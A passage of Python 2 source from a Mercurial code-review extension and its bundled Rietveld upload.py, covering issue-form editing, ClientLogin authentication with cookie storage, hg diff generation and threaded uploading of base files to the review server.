    fields as a dict of UTF-8 strings."""
    parser = FormParser()
    parser.feed(ustr(MySend(url)))  # f.feed wants unicode
    parser.close()
    # convert back to utf-8 to restore sanity
    fields = {}
    for key, val in parser.map.items():
        fields[key.encode("utf-8")] = val.replace("\r\n", "\n").encode("utf-8")
    return fields
def EditDesc(issue, subject=None, desc=None, reviewers=None, cc=None, closed=False, private=False):
    """Update metadata of a Rietveld issue via its /<issue>/edit form.
    Only fields whose argument is not None (or True for the booleans)
    are changed; the rest keep the values scraped from the form.
    Exits the process on server error.
    """
    set_status("uploading change to description")
    form_fields = GetForm("/" + issue + "/edit")
    if subject is not None:
        form_fields['subject'] = subject
    if desc is not None:
        form_fields['description'] = desc
    if reviewers is not None:
        form_fields['reviewers'] = reviewers
    if cc is not None:
        form_fields['cc'] = cc
    if closed:
        form_fields['closed'] = "checked"
    if private:
        form_fields['private'] = "checked"
    ctype, body = EncodeMultipartFormData(form_fields.items(), [])
    response = MySend("/" + issue + "/edit", body, content_type=ctype)
    if response != "":
        # A non-empty response body is the server's error page.
        print >>sys.stderr, "Error editing description:\n" + "Sent form: \n", form_fields, "\n", response
        sys.exit(2)
def PostMessage(ui, issue, message, reviewers=None, cc=None, send_mail=True, subject=None):
set_status("uploading message")
form_fields = GetForm("/" + issue + "/publish")
if reviewers is not None:
form_fields['reviewers'] = reviewers
if cc is not None:
form_fields['cc'] = cc
if send_mail:
form_fields['send_mail'] = "checked"
else:
del form_fields['send_mail']
if subject is not None:
form_fields['subject'] = subject
form_fields['message'] = message
form_fields['message_only'] = '1' # Don't include draft comments
if reviewers is not None or cc is not None:
form_fields['message_only'] = '' # Must set '' in order to override cc/reviewer
ctype = "applications/x-www-form-urlencoded"
body = urllib.urlencode(form_fields)
response = MySend("/" + issue + "/publish", body, content_type=ctype)
if response != "":
print response
sys.exit(2)
class opt(object):
    # Empty attribute bag: RietveldSetup fills an instance of this with
    # the fields (email, host, server, ...) that the upload.py code
    # below expects on its options object.
    pass
def nocommit(*pats, **opts):
    """(disabled when using this extension)"""
    # Installed over cmdutil.commit in RietveldSetup so plain
    # "hg commit" cannot bypass the code review workflow.
    raise util.Abort("codereview extension enabled; use mail, upload, or submit instead of commit")
def nobackout(*pats, **opts):
    """(disabled when using this extension)"""
    # Defined for symmetry with nocommit/norollback; RietveldSetup
    # notes it cannot actually install this one.
    raise util.Abort("codereview extension enabled; use undo instead of backout")
def norollback(*pats, **opts):
    """(disabled when using this extension)"""
    # Installed over repo.rollback in RietveldSetup; the original is
    # saved as real_rollback for submit's failure path.
    raise util.Abort("codereview extension enabled; use undo instead of rollback")
def RietveldSetup(ui, repo):
    """Per-repository initialization: read codereview.cfg, disable the
    unsafe built-in Mercurial commands, load CONTRIBUTORS, build the
    upload.py options object, and find the current release branch."""
    global defaultcc, upload_options, rpc, server, server_url_base, force_google_account, verbosity, contributors
    global missing_codereview
    repo_config_path = ''
    # Read repository-specific options from lib/codereview/codereview.cfg
    try:
        repo_config_path = repo.root + '/lib/codereview/codereview.cfg'
        f = open(repo_config_path)
        for line in f:
            if line.startswith('defaultcc: '):
                # NOTE(review): line[10:] keeps the space after the
                # colon; presumably SplitCommaSpace tolerates leading
                # whitespace — confirm.
                defaultcc = SplitCommaSpace(line[10:])
    except:
        # If there are no options, chances are good this is not
        # a code review repository; stop now before we foul
        # things up even worse. Might also be that repo doesn't
        # even have a root. See issue 959.
        if repo_config_path == '':
            missing_codereview = 'codereview disabled: repository has no root'
        else:
            missing_codereview = 'codereview disabled: cannot open ' + repo_config_path
        return
    # Should only modify repository with hg submit.
    # Disable the built-in Mercurial commands that might
    # trip things up.
    cmdutil.commit = nocommit
    global real_rollback
    real_rollback = repo.rollback
    repo.rollback = norollback
    # would install nobackout if we could; oh well
    try:
        f = open(repo.root + '/CONTRIBUTORS', 'r')
    except:
        raise util.Abort("cannot open %s: %s" % (repo.root+'/CONTRIBUTORS', ExceptionDetail()))
    for line in f:
        # CONTRIBUTORS is a list of lines like:
        #   Person <email>
        #   Person <email> <alt-email>
        # The first email address is the one used in commit logs.
        if line.startswith('#'):
            continue
        m = re.match(r"([^<>]+\S)\s+(<[^<>\s]+>)((\s+<[^<>\s]+>)*)\s*$", line)
        if m:
            name = m.group(1)
            email = m.group(2)[1:-1]
            contributors[email.lower()] = (name, email)
            # Alternate addresses map to the same (name, primary email).
            for extra in m.group(3).split():
                contributors[extra[1:-1].lower()] = (name, email)
    if not ui.verbose:
        verbosity = 0
    # Config options.
    x = ui.config("codereview", "server")
    if x is not None:
        server = x
    # TODO(rsc): Take from ui.username?
    email = None
    x = ui.config("codereview", "email")
    if x is not None:
        email = x
    server_url_base = "http://" + server + "/"
    testing = ui.config("codereview", "testing")
    force_google_account = ui.configbool("codereview", "force_google_account", False)
    # Build the options object that upload.py's GetRpcServer expects.
    upload_options = opt()
    upload_options.email = email
    upload_options.host = None
    upload_options.verbose = 0
    upload_options.description = None
    upload_options.description_file = None
    upload_options.reviewers = None
    upload_options.cc = None
    upload_options.message = None
    upload_options.issue = None
    upload_options.download_base = False
    upload_options.revision = None
    upload_options.send_mail = False
    upload_options.vcs = None
    upload_options.server = server
    upload_options.save_cookies = True
    if testing:
        upload_options.save_cookies = False
        upload_options.email = "test@example.com"
    rpc = None
    # Pick the most recent release branch by string-sorting the tags.
    global releaseBranch
    tags = repo.branchtags().keys()
    if 'release-branch.r100' in tags:
        # NOTE(rsc): This tags.sort is going to get the wrong
        # answer when comparing release-branch.r99 with
        # release-branch.r100. If we do ten releases a year
        # that gives us 4 years before we have to worry about this.
        raise util.Abort('tags.sort needs to be fixed for release-branch.r100')
    tags.sort()
    for t in tags:
        if t.startswith('release-branch.'):
            releaseBranch = t
#######################################################################
# http://codereview.appspot.com/static/upload.py, heavily edited.
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tool for uploading diffs from a version control system to the codereview app.
Usage summary: upload.py [options] [-- diff_options]
Diff options are passed to the diff command of the underlying system.
Supported version control systems:
Git
Mercurial
Subversion
It is important for Git/Mercurial users to specify a tree/node/branch to diff
against by using the '--rev' option.
"""
# This code is derived from appcfg.py in the App Engine SDK (open source),
# and from ASPN recipe #146306.
import cookielib
import getpass
import logging
import mimetypes
import optparse
import os
import re
import socket
import subprocess
import sys
import urllib
import urllib2
import urlparse
# The md5 module was deprecated in Python 2.5.
try:
from hashlib import md5
except ImportError:
from md5 import md5
try:
import readline
except ImportError:
pass
# The logging verbosity:
#  0: Errors only.
#  1: Status messages.
#  2: Info logs.
#  3: Debug logs.
# (RietveldSetup above lowers this to 0 unless hg runs with --verbose.)
verbosity = 1
# Max size of patch or base file.
MAX_UPLOAD_SIZE = 900 * 1024
# whitelist for non-binary filetypes which do not start with "text/"
# .mm (Objective-C) shows up as application/x-freemind on my Linux box.
TEXT_MIMETYPES = [
    'application/javascript',
    'application/x-javascript',
    'application/x-freemind'
]
def GetEmail(prompt):
    """Prompts the user for their email address and returns it.
    The last used email address is saved to a file and offered up as a suggestion
    to the user. If the user presses enter without typing in anything the last
    used email address is used. If the user enters a new address, it is saved
    for next time we prompt.
    """
    last_email_file_name = os.path.expanduser("~/.last_codereview_email_address")
    last_email = ""
    if os.path.exists(last_email_file_name):
        try:
            last_email_file = open(last_email_file_name, "r")
            last_email = last_email_file.readline().strip("\n")
            last_email_file.close()
            prompt += " [%s]" % last_email
        except IOError, e:
            # Best effort: fall back to prompting without a suggestion.
            pass
    email = raw_input(prompt + ": ").strip()
    if email:
        try:
            last_email_file = open(last_email_file_name, "w")
            last_email_file.write(email)
            last_email_file.close()
        except IOError, e:
            # Best effort: failing to save the suggestion is harmless.
            pass
    else:
        email = last_email
    return email
def StatusUpdate(msg):
    """Print a status message to stdout.
    If 'verbosity' is greater than 0, print the message.
    Args:
        msg: The string to print.
    """
    if verbosity > 0:
        print msg
def ErrorExit(msg):
    """Print an error message to stderr and exit."""
    print >>sys.stderr, msg
    sys.exit(1)
class ClientLoginError(urllib2.HTTPError):
    """Raised to indicate there was an error authenticating with ClientLogin."""
    def __init__(self, url, code, msg, headers, args):
        urllib2.HTTPError.__init__(self, url, code, msg, headers, None)
        self.args = args
        # ClientLogin reports the failure kind under the "Error" key
        # (e.g. "BadAuthentication", "CaptchaRequired" — see _Authenticate).
        self.reason = args["Error"]
class AbstractRpcServer(object):
    """Provides a common interface for a simple RPC server."""
    def __init__(self, host, auth_function, host_override=None, extra_headers={}, save_cookies=False):
        """Creates a new HttpRpcServer.
        Args:
            host: The host to send requests to.
            auth_function: A function that takes no arguments and returns an
                (email, password) tuple when called. Will be called if authentication
                is required.
            host_override: The host header to send to the server (defaults to host).
            extra_headers: A dict of extra headers to append to every request.
            save_cookies: If True, save the authentication cookies to local disk.
                If False, use an in-memory cookiejar instead. Subclasses must
                implement this functionality. Defaults to False.
        """
        self.host = host
        self.host_override = host_override
        self.auth_function = auth_function
        self.authenticated = False
        self.extra_headers = extra_headers
        self.save_cookies = save_cookies
        self.opener = self._GetOpener()
        if self.host_override:
            logging.info("Server: %s; Host: %s", self.host, self.host_override)
        else:
            logging.info("Server: %s", self.host)
    def _GetOpener(self):
        """Returns an OpenerDirector for making HTTP requests.
        Returns:
            A urllib2.OpenerDirector object.
        """
        raise NotImplementedError()
    def _CreateRequest(self, url, data=None):
        """Creates a new urllib request."""
        logging.debug("Creating request for: '%s' with payload:\n%s", url, data)
        req = urllib2.Request(url, data=data)
        if self.host_override:
            req.add_header("Host", self.host_override)
        for key, value in self.extra_headers.iteritems():
            req.add_header(key, value)
        return req
    def _GetAuthToken(self, email, password):
        """Uses ClientLogin to authenticate the user, returning an auth token.
        Args:
            email: The user's email address
            password: The user's password
        Raises:
            ClientLoginError: If there was an error authenticating with ClientLogin.
            HTTPError: If there was some other form of HTTP error.
        Returns:
            The authentication token returned by ClientLogin.
        """
        account_type = "GOOGLE"
        if self.host.endswith(".google.com") and not force_google_account:
            # Needed for use inside Google.
            account_type = "HOSTED"
        req = self._CreateRequest(
            url="https://www.google.com/accounts/ClientLogin",
            data=urllib.urlencode({
                "Email": email,
                "Passwd": password,
                "service": "ah",
                "source": "rietveld-codereview-upload",
                "accountType": account_type,
            }),
        )
        try:
            response = self.opener.open(req)
            response_body = response.read()
            response_dict = dict(x.split("=") for x in response_body.split("\n") if x)
            return response_dict["Auth"]
        except urllib2.HTTPError, e:
            if e.code == 403:
                # ClientLogin reports failures as 403 with an
                # Error=<reason> body; surface that as ClientLoginError.
                body = e.read()
                response_dict = dict(x.split("=", 1) for x in body.split("\n") if x)
                raise ClientLoginError(req.get_full_url(), e.code, e.msg, e.headers, response_dict)
            else:
                raise
    def _GetAuthCookie(self, auth_token):
        """Fetches authentication cookies for an authentication token.
        Args:
            auth_token: The authentication token returned by ClientLogin.
        Raises:
            HTTPError: If there was an error fetching the authentication cookies.
        """
        # This is a dummy value to allow us to identify when we're successful.
        continue_location = "http://localhost/"
        args = {"continue": continue_location, "auth": auth_token}
        req = self._CreateRequest("http://%s/_ah/login?%s" % (self.host, urllib.urlencode(args)))
        try:
            response = self.opener.open(req)
        except urllib2.HTTPError, e:
            # The opener ignores redirects, so a 302 arrives as an
            # HTTPError; it is the expected success case here.
            response = e
        if (response.code != 302 or
                response.info()["location"] != continue_location):
            raise urllib2.HTTPError(req.get_full_url(), response.code, response.msg, response.headers, response.fp)
        self.authenticated = True
    def _Authenticate(self):
        """Authenticates the user.
        The authentication process works as follows:
        1) We get a username and password from the user
        2) We use ClientLogin to obtain an AUTH token for the user
           (see http://code.google.com/apis/accounts/AuthForInstalledApps.html).
        3) We pass the auth token to /_ah/login on the server to obtain an
           authentication cookie. If login was successful, it tries to redirect
           us to the URL we provided.
        If we attempt to access the upload API without first obtaining an
        authentication cookie, it returns a 401 response (or a 302) and
        directs us to authenticate ourselves with ClientLogin.
        """
        # Allow up to three attempts at a bad password; every other
        # ClientLogin failure is reported once and not retried.
        for i in range(3):
            credentials = self.auth_function()
            try:
                auth_token = self._GetAuthToken(credentials[0], credentials[1])
            except ClientLoginError, e:
                if e.reason == "BadAuthentication":
                    print >>sys.stderr, "Invalid username or password."
                    continue
                if e.reason == "CaptchaRequired":
                    print >>sys.stderr, (
                        "Please go to\n"
                        "https://www.google.com/accounts/DisplayUnlockCaptcha\n"
                        "and verify you are a human. Then try again.")
                    break
                if e.reason == "NotVerified":
                    print >>sys.stderr, "Account not verified."
                    break
                if e.reason == "TermsNotAgreed":
                    print >>sys.stderr, "User has not agreed to TOS."
                    break
                if e.reason == "AccountDeleted":
                    print >>sys.stderr, "The user account has been deleted."
                    break
                if e.reason == "AccountDisabled":
                    print >>sys.stderr, "The user account has been disabled."
                    break
                if e.reason == "ServiceDisabled":
                    print >>sys.stderr, "The user's access to the service has been disabled."
                    break
                if e.reason == "ServiceUnavailable":
                    print >>sys.stderr, "The service is not available; try again later."
                    break
                raise
            self._GetAuthCookie(auth_token)
            return
    def Send(self, request_path, payload=None,
             content_type="application/octet-stream",
             timeout=None,
             **kwargs):
        """Sends an RPC and returns the response.
        Args:
            request_path: The path to send the request to, eg /api/appversion/create.
            payload: The body of the request, or None to send an empty request.
            content_type: The Content-Type header to use.
            timeout: timeout in seconds; default None i.e. no timeout.
                (Note: for large requests on OS X, the timeout doesn't work right.)
            kwargs: Any keyword arguments are converted into query string parameters.
        Returns:
            The response body, as a string.
        """
        # TODO: Don't require authentication. Let the server say
        # whether it is necessary.
        if not self.authenticated:
            self._Authenticate()
        old_timeout = socket.getdefaulttimeout()
        socket.setdefaulttimeout(timeout)
        try:
            tries = 0
            while True:
                tries += 1
                args = dict(kwargs)
                url = "http://%s%s" % (self.host, request_path)
                if args:
                    url += "?" + urllib.urlencode(args)
                req = self._CreateRequest(url=url, data=payload)
                req.add_header("Content-Type", content_type)
                try:
                    f = self.opener.open(req)
                    response = f.read()
                    f.close()
                    return response
                except urllib2.HTTPError, e:
                    if tries > 3:
                        raise
                    elif e.code == 401 or e.code == 302:
                        # Auth expired or redirect-to-login; re-auth, retry.
                        self._Authenticate()
                    else:
                        raise
        finally:
            # Restore the process-wide socket timeout no matter what.
            socket.setdefaulttimeout(old_timeout)
class HttpRpcServer(AbstractRpcServer):
    """Provides a simplified RPC-style interface for HTTP requests."""
    def _Authenticate(self):
        """Save the cookie jar after authentication."""
        super(HttpRpcServer, self)._Authenticate()
        if self.save_cookies:
            StatusUpdate("Saving authentication cookies to %s" % self.cookie_file)
            self.cookie_jar.save()
    def _GetOpener(self):
        """Returns an OpenerDirector that supports cookies and ignores redirects.
        Returns:
            A urllib2.OpenerDirector object.
        """
        opener = urllib2.OpenerDirector()
        opener.add_handler(urllib2.ProxyHandler())
        opener.add_handler(urllib2.UnknownHandler())
        opener.add_handler(urllib2.HTTPHandler())
        opener.add_handler(urllib2.HTTPDefaultErrorHandler())
        opener.add_handler(urllib2.HTTPSHandler())
        opener.add_handler(urllib2.HTTPErrorProcessor())
        if self.save_cookies:
            # One cookie file per code review server.
            self.cookie_file = os.path.expanduser("~/.codereview_upload_cookies_" + server)
            self.cookie_jar = cookielib.MozillaCookieJar(self.cookie_file)
            if os.path.exists(self.cookie_file):
                try:
                    self.cookie_jar.load()
                    self.authenticated = True
                    StatusUpdate("Loaded authentication cookies from %s" % self.cookie_file)
                except (cookielib.LoadError, IOError):
                    # Failed to load cookies - just ignore them.
                    pass
            else:
                # Create an empty cookie file with mode 600
                fd = os.open(self.cookie_file, os.O_CREAT, 0600)
                os.close(fd)
            # Always chmod the cookie file
            os.chmod(self.cookie_file, 0600)
        else:
            # Don't save cookies across runs of update.py.
            self.cookie_jar = cookielib.CookieJar()
        opener.add_handler(urllib2.HTTPCookieProcessor(self.cookie_jar))
        return opener
def GetRpcServer(options):
    """Returns an instance of an AbstractRpcServer.

    Args:
      options: Parsed command line options (server, host, email,
        save_cookies are read here).

    Returns:
      A new AbstractRpcServer, on which RPC calls can be made.
    """
    rpc_server_class = HttpRpcServer

    def GetUserCredentials():
        """Prompts the user for a username and password."""
        # Disable status prints so they don't obscure the password prompt.
        global global_status
        st = global_status
        global_status = None
        email = options.email
        if email is None:
            email = GetEmail("Email (login for uploading to %s)" % options.server)
        password = getpass.getpass("Password for %s: " % email)
        # Put status back.
        global_status = st
        return (email, password)

    # If this is the dev_appserver, use fake authentication.
    host = (options.host or options.server).lower()
    if host == "localhost" or host.startswith("localhost:"):
        email = options.email
        if email is None:
            email = "test@example.com"
            logging.info("Using debug user %s. Override with --email" % email)
        server = rpc_server_class(
            options.server,
            lambda: (email, "password"),
            host_override=options.host,
            # dev_appserver accepts this cookie as a logged-in, non-admin user.
            extra_headers={"Cookie": 'dev_appserver_login="%s:False"' % email},
            save_cookies=options.save_cookies)
        # Don't try to talk to ClientLogin.
        server.authenticated = True
        return server
    return rpc_server_class(options.server, GetUserCredentials,
        host_override=options.host, save_cookies=options.save_cookies)
def EncodeMultipartFormData(fields, files):
    """Encode form fields for multipart/form-data.

    Args:
      fields: A sequence of (name, value) elements for regular form fields.
      files: A sequence of (name, filename, value) elements for data to be
        uploaded as files.
    Returns:
      (content_type, body) ready for httplib.HTTP instance.
    Source:
      http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/146306
    """
    BOUNDARY = '-M-A-G-I-C---B-O-U-N-D-A-R-Y-'
    CRLF = '\r\n'
    parts = []
    add = parts.append
    # Plain form fields: one boundary-delimited section each.
    for (key, value) in fields:
        typecheck(key, str)
        typecheck(value, str)
        add('--' + BOUNDARY)
        add('Content-Disposition: form-data; name="%s"' % key)
        add('')
        add(value)
    # File attachments additionally carry a filename and a guessed MIME type.
    for (key, filename, value) in files:
        typecheck(key, str)
        typecheck(filename, str)
        typecheck(value, str)
        add('--' + BOUNDARY)
        add('Content-Disposition: form-data; name="%s"; filename="%s"' % (key, filename))
        add('Content-Type: %s' % GetContentType(filename))
        add('')
        add(value)
    # Closing boundary, then a trailing CRLF from the final empty element.
    add('--' + BOUNDARY + '--')
    add('')
    body = CRLF.join(parts)
    content_type = 'multipart/form-data; boundary=%s' % BOUNDARY
    return content_type, body
def GetContentType(filename):
    """Helper to guess the content-type from the filename."""
    guessed = mimetypes.guess_type(filename)[0]
    if not guessed:
        # No registered type for this extension: fall back to a generic one.
        return 'application/octet-stream'
    return guessed
# Use a shell for subcommands on Windows to get a PATH search.
# NOTE(review): presumably because subprocess on Windows only searches
# PATH for bare command names when shell=True — confirm.
use_shell = sys.platform.startswith("win")
def RunShellWithReturnCode(command, print_output=False,
        universal_newlines=True, env=os.environ):
    """Executes a command and returns the output from stdout and the return code.

    Args:
      command: Command to execute.
      print_output: If True, the output is printed to stdout.
        If False, both stdout and stderr are ignored.
      universal_newlines: Use universal_newlines flag (default: True).
      env: Environment passed to the subprocess (default: os.environ).

    Returns:
      Tuple (output, return code)
    """
    logging.info("Running %s", command)
    p = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
        shell=use_shell, universal_newlines=universal_newlines, env=env)
    if print_output:
        # Echo stdout line-by-line as it arrives, while also collecting it.
        output_array = []
        while True:
            line = p.stdout.readline()
            if not line:
                break
            print line.strip("\n")
            output_array.append(line)
        output = "".join(output_array)
    else:
        output = p.stdout.read()
    p.wait()
    # stderr is read after the process exits; echo it only in verbose mode.
    errout = p.stderr.read()
    if print_output and errout:
        print >>sys.stderr, errout
    p.stdout.close()
    p.stderr.close()
    return output, p.returncode
def RunShell(command, silent_ok=False, universal_newlines=True,
        print_output=False, env=os.environ):
    """Run command and return its stdout; abort via ErrorExit on failure.

    Empty output is also treated as an error unless silent_ok is set.
    """
    output, status = RunShellWithReturnCode(command, print_output,
        universal_newlines, env)
    if status:
        ErrorExit("Got error status from %s:\n%s" % (command, output))
    if not (silent_ok or output):
        ErrorExit("No output from %s" % command)
    return output
class VersionControlSystem(object):
    """Abstract base class providing an interface to the VCS."""

    def __init__(self, options):
        """Constructor.

        Args:
          options: Command line options.
        """
        self.options = options

    def GenerateDiff(self, args):
        """Return the current diff as a string.

        Args:
          args: Extra arguments to pass to the diff command.
        """
        raise NotImplementedError(
            "abstract method -- subclass %s must override" % self.__class__)

    def GetUnknownFiles(self):
        """Return a list of files unknown to the VCS."""
        raise NotImplementedError(
            "abstract method -- subclass %s must override" % self.__class__)

    def CheckForUnknownFiles(self):
        """Show an "are you sure?" prompt if there are unknown files."""
        unknown_files = self.GetUnknownFiles()
        if unknown_files:
            print "The following files are not added to version control:"
            for line in unknown_files:
                print line
            prompt = "Are you sure to continue?(y/N) "
            answer = raw_input(prompt).strip()
            if answer != "y":
                ErrorExit("User aborted")

    def GetBaseFile(self, filename):
        """Get the content of the upstream version of a file.

        Returns:
          A tuple (base_content, new_content, is_binary, status)
            base_content: The contents of the base file.
            new_content: For text files, this is empty.  For binary files, this is
              the contents of the new file, since the diff output won't contain
              information to reconstruct the current file.
            is_binary: True iff the file is binary.
            status: The status of the file.
        """
        raise NotImplementedError(
            "abstract method -- subclass %s must override" % self.__class__)

    def GetBaseFiles(self, diff):
        """Helper that calls GetBase file for each file in the patch.

        Returns:
          A dictionary that maps from filename to GetBaseFile's tuple.  Filenames
          are retrieved based on lines that start with "Index:" or
          "Property changes on:".
        """
        files = {}
        for line in diff.splitlines(True):
            if line.startswith('Index:') or line.startswith('Property changes on:'):
                unused, filename = line.split(':', 1)
                # On Windows if a file has property changes its filename uses '\'
                # instead of '/'.
                filename = filename.strip().replace('\\', '/')
                files[filename] = self.GetBaseFile(filename)
        return files

    def UploadBaseFiles(self, issue, rpc_server, patch_list, patchset, options,
                        files):
        """Uploads the base files (and if necessary, the current ones as well)."""

        def UploadFile(filename, file_id, content, is_binary, status, is_base):
            """Uploads a file to the server."""
            set_status("uploading " + filename)
            file_too_large = False
            if is_base:
                type = "base"
            else:
                type = "current"
            if len(content) > MAX_UPLOAD_SIZE:
                # Oversized files are uploaded with empty content and a marker
                # field so the server knows the content was omitted.
                print ("Not uploading the %s file for %s because it's too large." %
                    (type, filename))
                file_too_large = True
                content = ""
            checksum = md5(content).hexdigest()
            if options.verbose > 0 and not file_too_large:
                print "Uploading %s file for %s" % (type, filename)
            url = "/%d/upload_content/%d/%d" % (int(issue), int(patchset), file_id)
            form_fields = [
                ("filename", filename),
                ("status", status),
                ("checksum", checksum),
                ("is_binary", str(is_binary)),
                ("is_current", str(not is_base)),
            ]
            if file_too_large:
                form_fields.append(("file_too_large", "1"))
            if options.email:
                form_fields.append(("user", options.email))
            ctype, body = EncodeMultipartFormData(form_fields, [("data", filename, content)])
            response_body = rpc_server.Send(url, body, content_type=ctype)
            if not response_body.startswith("OK"):
                StatusUpdate(" --> %s" % response_body)
                sys.exit(1)

        # Don't want to spawn too many threads, nor do we want to
        # hit Rietveld too hard, or it will start serving 500 errors.
        # When 8 works, it's no better than 4, and sometimes 8 is
        # too many for Rietveld to handle.
        MAX_PARALLEL_UPLOADS = 4

        sema = threading.BoundedSemaphore(MAX_PARALLEL_UPLOADS)
        upload_threads = []
        finished_upload_threads = []

        class UploadFileThread(threading.Thread):
            # Worker thread: uploads one file, then parks itself on
            # finished_upload_threads and releases the semaphore slot.
            def __init__(self, args):
                threading.Thread.__init__(self)
                self.args = args
            def run(self):
                UploadFile(*self.args)
                finished_upload_threads.append(self)
                sema.release()

        def StartUploadFile(*args):
            # Blocks until an upload slot is free, reaps any finished
            # threads, then starts a new upload.
            sema.acquire()
            while len(finished_upload_threads) > 0:
                t = finished_upload_threads.pop()
                upload_threads.remove(t)
                t.join()
            t = UploadFileThread(args)
            upload_threads.append(t)
            t.start()

        def WaitForUploads():
            # Joins whatever is still in flight.
            for t in upload_threads:
                t.join()

        # Invert patch_list into filename -> patch-id-string.
        patches = dict()
        [patches.setdefault(v, k) for k, v in patch_list]
        for filename in patches.keys():
            base_content, new_content, is_binary, status = files[filename]
            file_id_str = patches.get(filename)
            if file_id_str.find("nobase") != -1:
                # "nobase" marker: the server does not want the base file;
                # the numeric id follows the final underscore.
                base_content = None
                file_id_str = file_id_str[file_id_str.rfind("_") + 1:]
            file_id = int(file_id_str)
            if base_content != None:
                StartUploadFile(filename, file_id, base_content, is_binary, status, True)
            if new_content != None:
                StartUploadFile(filename, file_id, new_content, is_binary, status, False)
        WaitForUploads()

    def IsImage(self, filename):
        """Returns true if the filename has an image extension."""
        mimetype = mimetypes.guess_type(filename)[0]
        if not mimetype:
            return False
        return mimetype.startswith("image/")

    def IsBinary(self, filename):
        """Returns true if the guessed mimetype isn't in the text group."""
        mimetype = mimetypes.guess_type(filename)[0]
        if not mimetype:
            return False  # e.g. README, "real" binaries usually have an extension
        # special case for text files which don't start with text/
        if mimetype in TEXT_MIMETYPES:
            return False
        return not mimetype.startswith("text/")
class FakeMercurialUI(object):
    """Minimal stand-in for a Mercurial ui object that captures output.

    Everything written through write() accumulates in self.output so the
    caller can inspect command output without it reaching the terminal.
    """

    def __init__(self):
        # quiet mimics the real ui attribute consulted by Mercurial commands.
        self.quiet = True
        self.output = ''

    def write(self, *args, **opts):
        """Append the space-joined positional arguments to the buffer."""
        joined = ' '.join(args)
        self.output = self.output + joined
# set to True to shell out to hg always; slower.  When False, status/cat
# queries go through the in-process Mercurial API instead (see
# MercurialVCS.GetBaseFile for both code paths).
use_hg_shell = False
class MercurialVCS(VersionControlSystem):
    """Implementation of the VersionControlSystem interface for Mercurial."""

    def __init__(self, options, ui, repo):
        super(MercurialVCS, self).__init__(options)
        self.ui = ui
        self.repo = repo
        # Absolute path to repository (we can be in a subdir)
        self.repo_dir = os.path.normpath(repo.root)
        # Compute the subdir
        cwd = os.path.normpath(os.getcwd())
        assert cwd.startswith(self.repo_dir)
        self.subdir = cwd[len(self.repo_dir):].lstrip(r"\/")
        if self.options.revision:
            self.base_rev = self.options.revision
        else:
            # Prefer qparent (the revision below any applied MQ patches)
            # when it resolves; otherwise fall back to the working parent.
            mqparent, err = RunShellWithReturnCode(['hg', 'log', '--rev', 'qparent', '--template={node}'])
            if not err and mqparent != "":
                self.base_rev = mqparent
            else:
                self.base_rev = RunShell(["hg", "parents", "-q"]).split(':')[1].strip()

    def _GetRelPath(self, filename):
        """Get relative path of a file according to the current directory,
        given its logical path in the repo."""
        assert filename.startswith(self.subdir), (filename, self.subdir)
        return filename[len(self.subdir):].lstrip(r"\/")

    def GenerateDiff(self, extra_args):
        """Return `hg diff --git` output rewritten to resemble svn diff."""
        # If no file specified, restrict to the current subdir
        extra_args = extra_args or ["."]
        cmd = ["hg", "diff", "--git", "-r", self.base_rev] + extra_args
        data = RunShell(cmd, silent_ok=True)
        svndiff = []
        filecount = 0
        for line in data.splitlines():
            m = re.match("diff --git a/(\S+) b/(\S+)", line)
            if m:
                # Modify line to make it look like as it comes from svn diff.
                # With this modification no changes on the server side are required
                # to make upload.py work with Mercurial repos.
                # NOTE: for proper handling of moved/copied files, we have to use
                # the second filename.
                filename = m.group(2)
                svndiff.append("Index: %s" % filename)
                svndiff.append("=" * 67)
                filecount += 1
                logging.info(line)
            else:
                svndiff.append(line)
        if not filecount:
            ErrorExit("No valid patches found in output from hg diff")
        return "\n".join(svndiff) + "\n"

    def GetUnknownFiles(self):
        """Return a list of files unknown to the VCS."""
        args = []
        status = RunShell(["hg", "status", "--rev", self.base_rev, "-u", "."],
            silent_ok=True)
        unknown_files = []
        for line in status.splitlines():
            # Each status line is "<flag> <filename>"; "?" marks unknown.
            st, fn = line.split(" ", 1)
            if st == "?":
                unknown_files.append(fn)
        return unknown_files

    def GetBaseFile(self, filename):
        """Return (base_content, new_content, is_binary, status) for filename."""
        set_status("inspecting " + filename)
        # "hg status" and "hg cat" both take a path relative to the current subdir
        # rather than to the repo root, but "hg diff" has given us the full path
        # to the repo root.
        base_content = ""
        new_content = None
        is_binary = False
        oldrelpath = relpath = self._GetRelPath(filename)
        # "hg status -C" returns two lines for moved/copied files, one otherwise
        if use_hg_shell:
            out = RunShell(["hg", "status", "-C", "--rev", self.base_rev, relpath])
        else:
            # In-process equivalent of the shell call, capturing output
            # through the fake ui object.
            fui = FakeMercurialUI()
            ret = commands.status(fui, self.repo, *[relpath], **{'rev': [self.base_rev], 'copies': True})
            if ret:
                raise util.Abort(ret)
            out = fui.output
        out = out.splitlines()
        # HACK: strip error message about missing file/directory if it isn't in
        # the working copy
        if out[0].startswith('%s: ' % relpath):
            out = out[1:]
        status, what = out[0].split(' ', 1)
        if len(out) > 1 and status == "A" and what == relpath:
            # Second status line names the copy/move source; treat the file
            # as modified relative to that source.
            oldrelpath = out[1].strip()
            status = "M"
        if ":" in self.base_rev:
            base_rev = self.base_rev.split(":", 1)[0]
        else:
            base_rev = self.base_rev
        if status != "A":
            if use_hg_shell:
                base_content = RunShell(["hg", "cat", "-r", base_rev, oldrelpath], silent_ok=True)
            else:
                base_content = str(self.repo[base_rev][oldrelpath].data())
            is_binary = "\0" in base_content  # Mercurial's heuristic
        if status != "R":
            new_content = open(relpath, "rb").read()
            is_binary = is_binary or "\0" in new_content
        if is_binary and base_content and use_hg_shell:
            # Fetch again without converting newlines
            base_content = RunShell(["hg", "cat", "-r", base_rev, oldrelpath],
                silent_ok=True, universal_newlines=False)
        if not is_binary or not self.IsImage(relpath):
            # Only binary images keep their new content; the server can
            # reconstruct text files from the diff.
            new_content = None
        return base_content, new_content, is_binary, status
# NOTE: The SplitPatch function is duplicated in engine.py, keep them in sync.
def SplitPatch(data):
